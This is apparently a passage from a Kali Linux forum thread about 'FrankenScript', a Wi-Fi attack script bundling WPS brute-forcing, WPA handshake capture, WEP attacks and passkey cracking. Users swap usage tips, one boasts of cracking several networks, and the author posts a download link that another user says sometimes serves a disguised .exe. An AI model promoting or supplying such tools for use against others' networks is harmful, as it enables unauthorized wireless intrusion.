    # [1] Interface Selection #
    # [2] System Mode Selection #
    # [3] Attack A WPS Enabled Access Point #
    # [4] Capture WPA/WPA2 Handshake #
    # [5] WEP Attacks #
    # [6] Attack Handshake.cap Files #
    # [7] Show Recovered Passkeys #
    # [8] Recovered Passkey Checker #
    # #
    #########################################

    Chosen Interface: wlan0
    System Mode: Attack Mode Is Enabled
    MAC address for mon0: 40:2d:60:68:79:8f

    Please choose an option?: 3




    Scan for WPS enabled access points.
    Press Ctrl+c on the wash screen to stop the scan and to choose a target.
    Press [Enter] to launch the scan.

  27. #77
    Join Date
    2013-Oct
    Posts
    321
    Glad to hear its working for you, You'll have to have a little play with it to get use to it and to find out what works for you.

    So what's your opinions regarding FrankenScript?, anything you would like to see added to it?.
    All constructive criticism welcome. :-)
    Last edited by slim76; 2014-02-06 at 23:36.

  28. #78
    Join Date
    2013-Oct
    Posts
    321
    Due to the lack of feedback and interest I very much doubt that I'll be releasing any further updates or scripts.

  29. #79
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    id like to see other things you release
    Smile while you can for in the future there my be nothing to smile about.
    申し訳ありませんが、これは翻訳することができませんでした。

  30. #80
    Join Date
    2014-Feb
    Posts
    1
    I'm very interested in trying this out slim. and major props for making it

    I will be testing it out tonight on BT5 R3 and see if it works. It should in theory since I have dhcp3 client / server and mdk3 already installed and up to date.

    I am also installing kali right now on another USB stick so we'll see how this goes.

    Once again thanks for this major works. I looked at the script and it is huge. One of the largest I've ever seen next to Social engineering toolkit.

  31. #81
    Join Date
    2014-Feb
    Posts
    1
    Hi slim,

    I finally have time to try your script in the weekend with WPS attack option for my TP-Link N750 router. Your script worked great, wash has no problem to find wps enabled APs and options for reaver is easy to incorporate. Just my router locked out easily but your mdk3 options come in handy to reset it. I think its just a matter of time for me to attack my router successfully.

    You script is great to put many tools together for pentesting APs. I have yet to try attacking handshakes with your script.... can't wait to see your new update!


  32. #82
    Join Date
    2013-Oct
    Posts
    321
    I've already updated option 6 again, it now supports drag and drop a wordlist or directory containing multiple wordlists.
    Not sure if I'm going upload it for everyone though, but I guess time will tell.

  33. #83
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Cl0th0 View Post
    Hi slim,

    I finally have time to try your script in the weekend with WPS attack option for my TP-Link N750 router. Your script worked great, wash has no problem to find wps enabled APs and options for reaver is easy to incorporate. Just my router locked out easily but your mdk3 options come in handy to reset it. I think its just a matter of time for me to attack my router successfully.

    You script is great to put many tools together for pentesting APs. I have yet to try attacking handshakes with your script.... can't wait to see your new update!

    Thanks for testing MDK3 for me hahahah... I haven't had time to test it but I guess it's working! Good job slim!

  34. #84
    Join Date
    2013-Jul
    Posts
    844
    To soxrox 2212

    Any chance you could send us version 2. We tried kali-linux win7 and XP for hours.

    Muskt Team A

  35. #85
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by mmusket33 View Post
    To soxrox 2212

    Any chance you could send us version 2. We tried kali-linux win7 and XP for hours.

    Muskt Team A
    Version 2 of what?

  36. #86
    Join Date
    2013-Jul
    Posts
    844
    Sorry Soxrox we were refering to FrankenScript-v3.2 our mistake. We are unable to download a copy where we are at present.

  37. #87
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by mmusket33 View Post
    Sorry Soxrox we were refering to FrankenScript-v3.2 our mistake. We are unable to download a copy where we are at present.
    Sure I'll e-mail you it.

  38. #88
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Any more updates on the script coming?

  39. #89
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    Any more updates on the script coming?
    It's changed a lot since I last posted it here, I've added new features, options, and tools. ;-)
    People didn't want to leave any feedback so I stopped uploading it.
    I can't fix things for others if they won't tell me what is and isn't working for them.

  40. #90
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by slim76 View Post
    It's changed a lot since I last posted it here, I've added new features, options, and tools. ;-)
    People didn't want to leave any feedback so I stopped uploading it.
    I can't fix things for others if they won't tell me what is and isn't working for them.
    Guess I'll go do some bug hunting soon

  41. #91
    Join Date
    2014-Jun
    Posts
    1
    slim76 just wanted to let you know that I really love your script and I would love to get the updated version of it. It owned copule of Wifis in minutes so far with it

  42. #92
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    So was this script incorporated in 1.0.7?

    How can we follow development of FrankenScript slim76? These forums are not the best way to get feedback from what I've noticed.

    Anyways, continue the good work!!
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  43. #93
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Slim, I was wondering if you could add a Belkin default password generator. Here is the git page from the developer, safari tells me that there may be possible phishing on the site but I think its clean... Proceed with caution. The original thread is here. Let me know if you can get it working!

  44. #94
    Join Date
    2013-Oct
    Posts
    321
    @ learning.
    I'm currenly rewriting a couple of the attack options, then I'll upload it.

    @ Quest.
    It's not included in Kali but you can download it from the first page, if the links are dead you can ask another member if they'll upload it for you, or you can wait for the updated version.

    @ soxrok2212.
    I added Belkin default password generator ages ago lol, I also added some others too. :-)

    To all,
    Will upload the new version when I've rewriten some of the options.

  45. #95
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    That is just great!

    If someone that actually knows what he's doing can write a short Howto for that new version(to come) of FrankenScript, it will be appreciated. As obvious as some operations may seem to some of you, it is a complete mystery for others.

    If some of you can 'torrent' it, It will facilitate accessibility for all.

    Thank you for all the work Slim!! Hopefully it will make it's way in the next Kali.
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  46. #96
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by Quest View Post
    That is just great!

    If someone that actually knows what he's doing can write a short Howto for that new version(to come) of FrankenScript, it will be appreciated. As obvious as some operations may seem to some of you, it is a complete mystery for others.

    If some of you can 'torrent' it, It will facilitate accessibility for all.

    Thank you for all the work Slim!! Hopefully it will make it's way in the next Kali.
    There's no need to torrent it as its only a small file, and no need for a how to either cause it's dummy proof. LOL

  47. #97
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    dummy proof is good! Torrent though might help you diffuse your work. Any ETA on the new version Slim?
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  48. #98
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by Quest View Post
    dummy proof is good! Torrent though might help you diffuse your work. Any ETA on the new version Slim?
    I've got a lot going on at the moment but hope to have it ready within the next few days if all goes well.

  49. #99
    Join Date
    2013-Oct
    Posts
    321
    Here's the latest FrankenScript.

    WHEN DOWNLOADING, DO NOT CLICK THE BIG DOWNLOAD BUTTON AT THE TOP OF THE PAGE.

    FrankenScript2-10-06-2014.tar.gz
    http://mir.cr/0HBX0O5C
    Last edited by slim76; 2014-06-10 at 00:08.

  50. #100
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    some of the downloads are NOT FrankenScript2-10-06-2014.tar.gz But FrankenScript2-10-06-2014.tar.gz.exe (322*576 b).

    The download should be 1*081*616 b in size, named FrankenScript2-10-06-2014.tar.gz, and not an exe.

    Thank you Slim!!
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

Similar Threads

  1. Replies: 0
    Last Post: 2020-05-07, 19:24
  2. Kali 2.0 on a USB, trying to access files from Windows 10 OS
    By Justa5uvus in forum General Archive
    Replies: 1
    Last Post: 2016-01-28, 11:41
  3. Any other programs to create evil twin/rogue access points?
    By Dark Terror in forum General Archive
    Replies: 1
    Last Post: 2015-05-11, 02:08
  4. WPA PSK Key in pcap/cap files?
    By Kalinoob in forum General Archive
    Replies: 1
    Last Post: 2014-01-06, 15:39
  5. ferret makes huge .pcap files
    By 3t3st3r in forum General Archive
    Replies: 2
    Last Post: 2013-05-19, 19:22

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •